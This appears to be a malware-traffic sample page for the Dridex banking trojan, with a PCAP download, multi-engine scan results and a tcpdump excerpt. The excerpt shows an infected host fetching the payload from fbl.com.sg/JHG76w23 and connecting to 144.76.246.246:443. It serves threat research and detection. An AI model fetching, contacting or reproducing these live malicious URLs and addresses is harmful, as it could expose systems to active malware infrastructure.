Dridex (Cridex) banking trojan: PCAP download of a traffic sample (payload fetched from fbl.com.sg/JHG76w23, follow-up connection to 144.76.246.246:443)


Download Attachments

  • pcap jhg
    Date added: January 26, 2018 5:40 am; added by: admin; file size: 49 KB; downloads: 7

Multi-engine scan result for the downloaded payload (JHG76w23): 32 engines detected this file

SHA-256: bad8a41d33fe0e4cce27f41005e498c0ac26eef9f59099ad2d538bc429e4d289
File name: JHG76w23
File size: 140 KB
Last analysis: 2018-01-26 03:17:24 UTC
Community score: -105

Detections listed on the page (12 of the 32), as engine: verdict

  • Ikarus: Trojan.Kryptik
  • Kaspersky: Backdoor.Win32.Dridex.sr
  • Malwarebytes: Trojan.Dridex
  • MAX: malware (ai score=97)
  • McAfee: RDN/Generic.hbg
  • McAfee-GW-Edition: BehavesLike.Win32.PUPXAX.ch
  • Palo Alto Networks: generic.ml
  • Rising: Malware.XPACK-LNR/Heur!1.5594 (CLASSIC)
  • SentinelOne: static engine – malicious
  • Sophos AV: Troj/Dridex-ZN
  • Sophos ML: heuristic
  • Symantec: Trojan.Cridex

Excerpt from the capture (tcpdump output with timestamps and an ASCII dump of each packet): the initial HTTP GET for /JHG76w23 from fbl.com.sg (103.26.41.71), followed by the client's connection to 144.76.246.246 on port 443.

2018-01-25 22:03:43.757982 IP 192.168.1.102.52880 > 103.26.41.71.80: Flags [P.], seq 0:481, ack 1, win 256, length 481: HTTP: GET /JHG76w23 HTTP/1.1
E.. Ss@...S....fg.)G...P..~j#...P....Q..GET /JHG76w23 HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: fbl.com.sg
Connection: Keep-Alive

2018-01-25 22:04:18.691476 IP 192.168.1.102.52885 > 144.76.246.246.443: Flags [S], seq 878709239, win 64240, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..47.@...zV...f.L......4` ..........&..............
2018-01-25 22:04:18.808384 IP 192.168.1.102.52885 > 144.76.246.246.443: Flags [.], ack 72323680, win 256, length 0
E..(7.@...za...f.L......4` ..O.`P....*........
2018-01-25 22:04:18.812499 IP 192.168.1.102.52885 > 144.76.246.246.443: Flags [P.], seq 0:104, ack 1, win 256, length 104
E...7.@...y....f.L......4` ..O.`P...$X......c..._..Zj..z...3Q....?..[...g..Rk........../.5...
..... .
.2.8..........................
..............
2018-01-25 22:04:18.931590 IP 192.168.1.102.52885 > 144.76.246.246.443: Flags [P.], seq 104:430, ack 1036, win 252, length 326
E..n7.@...y....f.L......4`
`.O.kP....2..............tE..N1..W...D...... ..+_t...Md.uRI.#o....n...Q.vDn.b]..Z...4..>47....m...'%..F.@H.mR.7b.:.H2...,....\u..s.....u.......7K.A.c.wr|..4n....I.]a...0..8...o.....(;bF.Zi........../..u.V-Dw.#.....].{...7.%....)...J P*./.F.F.!G.., ..+.N...~.e..S.(.{B.....X..+K.LC..........0[.f' ...._..q.......R
.......}#.v......!.".....Q
2018-01-25 22:04:19.103430 IP 192.168.1.102.52885 > 144.76.246.246.443: Flags [P.], seq 430:563, ack 1095, win 252, length 133
E...7 @...y....f.L......4`...O..P...............C..e._b...F-.'..5..Z.z)..s.zSJ...=..5...j....{...w......h....Y.sO-.........fPE9.N../.1N`.}....*l\D...1. ...g`.{H...&..p...Sn.
2018-01-25 22:04:19.104835 IP 192.168.1.102.52885 > 144.76.246.246.443: Flags [P.], seq 563:2023, ack 1095, win 252, length 1460
E...7!@...t....f.L......4`.+.O..P..............c.2.D